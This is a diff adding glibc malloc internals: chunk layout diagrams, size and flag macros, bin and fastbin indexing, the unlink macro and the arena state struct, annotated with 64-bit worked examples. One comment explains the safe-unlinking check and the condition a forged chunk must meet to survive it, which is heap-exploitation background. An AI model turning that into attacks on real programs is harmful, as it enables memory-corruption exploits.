+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(int action, const char *str, void *ptr, mstate av);
+
+static void* internal_function mem2mem_check(void *p, size_t sz);
+static int internal_function top_check(void);
+static void internal_function munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr internal_function mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+
+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                     |A|M|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             (size of chunk, but used for application data)    |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|1|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                     |A|0|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|0|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    The A (NON_MAIN_ARENA) bit is cleared for chunks on the initial,
+    main arena, described by the main_arena variable.  When additional
+    threads are spawned, each thread receives its own arena (up to a
+    configurable limit, after which arenas are reused for multiple
+    threads), and the chunks in these arenas have the A bit set.  To
+    find the arena for a chunk on such a non-main arena, heap_for_ptr
+    performs a bit mask operation and indirection through the ar_ptr
+    member of the per-heap header heap_info (see arena.c).
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The three exceptions to all this are:
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size
+	field.  If the M bit is set, the other bits are ignored
+	(because mmapped chunks are neither in an arena, nor adjacent
+	to a freed chunk).  The M bit is also used for chunks which
+	originally came from a dumped heap via malloc_set_state in
+	hooks.c.
+
+     3. Chunks in fastbins are treated as allocated chunks from the
+	point of view of the chunk allocator.  They are consolidated
+	with their neighbors only in bulk, in malloc_consolidate.
+*/
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
+
+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
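+
+/*
+  Worked example (assuming a typical 64-bit build: SIZE_SZ == 8,
+  MALLOC_ALIGNMENT == 16):
+
+    chunk2mem (p)  == (char *) p + 16   // user data starts after the
+    mem2chunk (m)  == (char *) m - 16   //   prev_size and size fields
+    MIN_CHUNK_SIZE == 32                // prev_size + size + fd + bk
+    MINSIZE        == 32                // already 16-byte aligned
+*/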
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+
+/*
+   Check if a request is so large that it would wrap around zero when
+   padded and aligned. To simplify some other code, the bound is made
+   low enough so that adding MINSIZE will also not wrap around zero.
+ */
+
+#define REQUEST_OUT_OF_RANGE(req)                                 \
+  ((unsigned long) (req) >=						      \
+   (unsigned long) (INTERNAL_SIZE_T) (-2 * MINSIZE))
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
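+
+/*
+  Worked example (assuming a 64-bit build: SIZE_SZ == 8,
+  MALLOC_ALIGN_MASK == 15, MINSIZE == 32):
+
+    request2size (0)   == 32    // below MINSIZE, bumped up
+    request2size (24)  == 32    // (24 + 8 + 15) & ~15
+    request2size (25)  == 48    // next 16-byte multiple
+    request2size (120) == 128   // largest request served by a 0x80 chunk
+*/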
+
+/*  Same, except also perform argument check */
+
+#define checked_request2size(req, sz)                             \
+  if (REQUEST_OUT_OF_RANGE (req)) {					      \
+      __set_errno (ENOMEM);						      \
+      return 0;								      \
+    }									      \
+  (sz) = request2size (req);
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->mchunk_size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->mchunk_size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* Check for chunk from main arena.  */
+#define chunk_main_arena(p) (((p)->mchunk_size & NON_MAIN_ARENA) == 0)
+
+/* Mark a chunk as not being on the main arena.  */
+#define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
+
+/* Like chunksize, but do not mask SIZE_BITS.  */
+#define chunksize_nomask(p)         ((p)->mchunk_size)
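+
+/*
+  Worked example: on a 64-bit build, a chunk whose size field holds 0x91
+  satisfies
+
+    chunksize_nomask (p) == 0x91
+    chunksize (p)        == 0x90   // low three flag bits masked off
+    prev_inuse (p)       == 1      // PREV_INUSE set
+    chunk_is_mmapped (p) == 0
+    chunk_main_arena (p) == 1      // NON_MAIN_ARENA clear
+*/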
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
+
+/* Size of the chunk below P.  Only valid if prev_inuse (P).  */
+#define prev_size(p) ((p)->mchunk_prev_size)
+
+/* Set the size of the chunk below P.  Only valid if prev_inuse (P).  */
+#define set_prev_size(p, sz) ((p)->mchunk_prev_size = (sz))
+
+/* Ptr to previous physical malloc_chunk.  Only valid if prev_inuse (P).  */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->mchunk_size = (((p)->mchunk_size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->mchunk_size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s))
+
+
+#pragma GCC poison mchunk_size
+#pragma GCC poison mchunk_prev_size
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4byte
+   pointers and size_t.)
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
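+
+/*
+  Illustrative layout: only the fd/bk pair is actually stored per bin,
+  repositioned so that it can be treated as a malloc_chunk:
+
+    bin_at (M, 1)->fd   overlays   M->bins[0]   // unsorted bin
+    bin_at (M, 1)->bk   overlays   M->bins[1]
+    bin_at (M, 2)->fd   overlays   M->bins[2]   // first small bin
+    bin_at (M, 2)->bk   overlays   M->bins[3]
+*/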
+
+/* Take a chunk off a bin list */
+#define unlink(AV, P, BK, FD) {                                            \
+    FD = P->fd;								      \
+    BK = P->bk;								      \
+    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))		      \
+      malloc_printerr (check_action, "corrupted double-linked list", P, AV);  \
+    else {								      \
+        FD->bk = BK;							      \
+        BK->fd = FD;							      \
+        if (!in_smallbin_range (chunksize_nomask (P))			      \
+            && __builtin_expect (P->fd_nextsize != NULL, 0)) {		      \
+	    if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)	      \
+		|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    \
+	      malloc_printerr (check_action,				      \
+			       "corrupted double-linked list (not small)",    \
+			       P, AV);					      \
+            if (FD->fd_nextsize == NULL) {				      \
+                if (P->fd_nextsize == P)				      \
+                  FD->fd_nextsize = FD->bk_nextsize = FD;		      \
+                else {							      \
+                    FD->fd_nextsize = P->fd_nextsize;			      \
+                    FD->bk_nextsize = P->bk_nextsize;			      \
+                    P->fd_nextsize->bk_nextsize = FD;			      \
+                    P->bk_nextsize->fd_nextsize = FD;			      \
+                  }							      \
+              } else {							      \
+                P->fd_nextsize->bk_nextsize = P->bk_nextsize;		      \
+                P->bk_nextsize->fd_nextsize = P->fd_nextsize;		      \
+              }								      \
+          }								      \
+      }									      \
+}
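+
+/*
+  Sketch of the integrity check above: before P is taken off its list,
+  its neighbours must still point back at it, i.e.
+
+    P->fd->bk == P  &&  P->bk->fd == P
+
+  so a forged or corrupted chunk only survives unlinking if both of the
+  addresses written into its fd and bk fields themselves contain a
+  pointer back to P (the classic "safe unlinking" mitigation).
+*/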
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
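+
+/*
+  Worked example (64-bit build: SMALLBIN_WIDTH == 16, MIN_LARGE_SIZE == 0x400):
+
+    bin_index (0x20)  == smallbin_index (0x20)  == 2    // smallest small bin
+    bin_index (0x90)  == smallbin_index (0x90)  == 9
+    bin_index (0x3f0) == smallbin_index (0x3f0) == 63   // last small bin
+    bin_index (0x400) == largebin_index (0x400) == 64   // first large bin
+*/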
+
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. They are then placed
+    in regular bins after malloc gives them ONE chance to be used before
+    binning. So, basically, the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even if on 64bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
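+
+/*
+  Worked example: with 32-bit map words, bin 64 lives in block
+  idx2block (64) == 2 at bit idx2bit (64) == 1 << 0, so mark_bin (m, 64)
+  sets the lowest bit of m->binmap[2].
+*/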
+
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
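+
+/*
+  Worked example (64-bit build, SIZE_SZ == 8):
+
+    fastbin_index (0x20) == 0     // smallest fastbin chunk size
+    fastbin_index (0x80) == 6     // largest fastbin used by default
+    MAX_FAST_SIZE        == 160   // 80 * 8 / 4
+    NFASTBINS            == 10    // request2size (160) == 0xb0 -> index 9
+*/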
+
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   Since the lowest 2 bits in max_fast don't matter in size comparisons,
+   they are used as flags.
+ */
+
+/*
+   FASTCHUNKS_BIT held in max_fast indicates that there are probably
+   some fastbin chunks. It is set true on entering a chunk into any
+   fastbin, and cleared only in malloc_consolidate.
+
+   The truth value is inverted so that have_fastchunks will be true
+   upon startup (since statics are zero-filled), simplifying
+   initialization checks.
+ */
+
+#define FASTCHUNKS_BIT        (1U)
+
+#define have_fastchunks(M)     (((M)->flags & FASTCHUNKS_BIT) == 0)
+#define clear_fastchunks(M)    catomic_or (&(M)->flags, FASTCHUNKS_BIT)
+#define set_fastchunks(M)      catomic_and (&(M)->flags, ~FASTCHUNKS_BIT)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* ARENA_CORRUPTION_BIT is set if a memory corruption was detected on the
+   arena.  Such an arena is no longer used to allocate chunks.  Chunks
+   allocated in that arena before detecting corruption are not freed.  */
+
+#define ARENA_CORRUPTION_BIT (4U)
+
+#define arena_is_corrupt(A)	(((A)->flags & ARENA_CORRUPTION_BIT))
+#define set_arena_corrupt(A)	((A)->flags |= ARENA_CORRUPTION_BIT)
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks.
+   Setting the value clears fastchunk bit but preserves noncontiguous bit.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+#define get_max_fast() global_max_fast
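+
+/*
+  Worked example (64-bit build): DEFAULT_MXFAST is 64 * 8 / 4 == 128, so
+
+    set_max_fast (128)  =>  global_max_fast == (128 + 8) & ~15 == 0x80
+
+  i.e. by default chunks up to 0x80 bytes (user requests up to 120 bytes)
+  are served from fastbins.
+*/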
+
+
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+struct malloc_state
+{
+  /* Serialize access.  */
+  __libc_lock_define (, mutex);
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
